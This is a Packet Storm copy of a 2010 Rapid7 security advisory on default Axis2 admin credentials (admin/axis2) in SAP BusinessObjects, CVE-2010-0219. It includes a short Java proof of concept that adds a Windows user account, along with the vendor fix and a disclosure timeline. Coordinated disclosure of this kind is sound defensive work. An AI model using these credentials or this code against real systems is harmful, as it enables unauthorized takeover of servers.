exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Rapid7 Security Advisory 37

Rapid7 Security Advisory 37
Posted Oct 15, 2010
Authored by H D Moore, Rapid7, Joshua D. Abraham, Will Vandevanter | Site rapid7.com

Rapid7 Security Advisory - The SAP BusinessObjects product contains a module (dswsbobje.war) which deploys Axis2 with an administrator account which is configured with a static password. As a result, anyone with access to the Axis2 port can gain full access to the machine via arbitrary remote code execution. This requires the attacker to upload a malicious web service and to restart the instance of Tomcat. This issue may apply to other products and vendors that embed the Axis2 component. The username is "admin" and the password is "axis2", this is also the default for standalone Axis2 installations.

tags | exploit, remote, web, arbitrary, code execution
advisories | CVE-2010-0219
SHA-256 | 226db62066f2c56c87818ee78e4d00164861cd9e8d34858c75dc772b294bbff8

Rapid7 Security Advisory 37

Change Mirror Download
R7-0037: SAP BusinessObjects Axis2 Default Admin Password
October 13th, 2010

Description:

The SAP BusinessObjects product contains a module (dswsbobje.war) which
deploys Axis2 with an administrator account which is configured with a
static password. As a result, anyone with access to the Axis2 port can
gain full access to the machine via arbitrary remote code execution.
This requires the attacker to upload a malicious web service and to
restart the instance of Tomcat. This issue may apply to other products
and vendors that embed the Axis2 component. The username is "admin" and
the password is "axis2", this is also the default for standalone Axis2
installations.

Impact:

An attacker can execute arbitrary code by creating a malicious web
service (jar). The attacker can log in to the Axis2 component with the
default admin account, upload the malicious web service, and upon
restart the malicious code will be executed.

Proof of Concept Code:

Create a webservice (jar) which contains malicious code. Login to Axis2
and upload the web service. Restart Tomcat and the malicious code will
execute once Axis2 is loaded.

package org.apache.axis2.axis2userguide; import java.io.IOException;
public class AddUser {
public AddUser() {
Process process;
try {
process = Runtime.getRuntime().exec("net user foo bar /add");
}
catch(IOException ioexception) {
ioexception.printStackTrace();
}
}
public void main() {
return;
}
}

CVE: CVE-2010-0219

Vendor Response:

A fix has been provided on the SAP customer support site: SAP Security
Note 1432881. Please note that this site requires authentication.

References:

http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
http://www.kb.cert.org/vuls/id/989719

Disclosure Timeline:

2010-08-12 - Vulnerability reported to the vendor via email
2010-08-12 - Vendor confirmed the vulnerability
2010-09-02 - Vulnerability reported to CERT
2010-10-13 - Coordinated public release of advisory

Credit:

This vulnerability was reported by Joshua Abraham and Will Vandevanter.

About Rapid7 Security:

Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

http://www.rapid7.com/disclosure.jsp
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    8 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close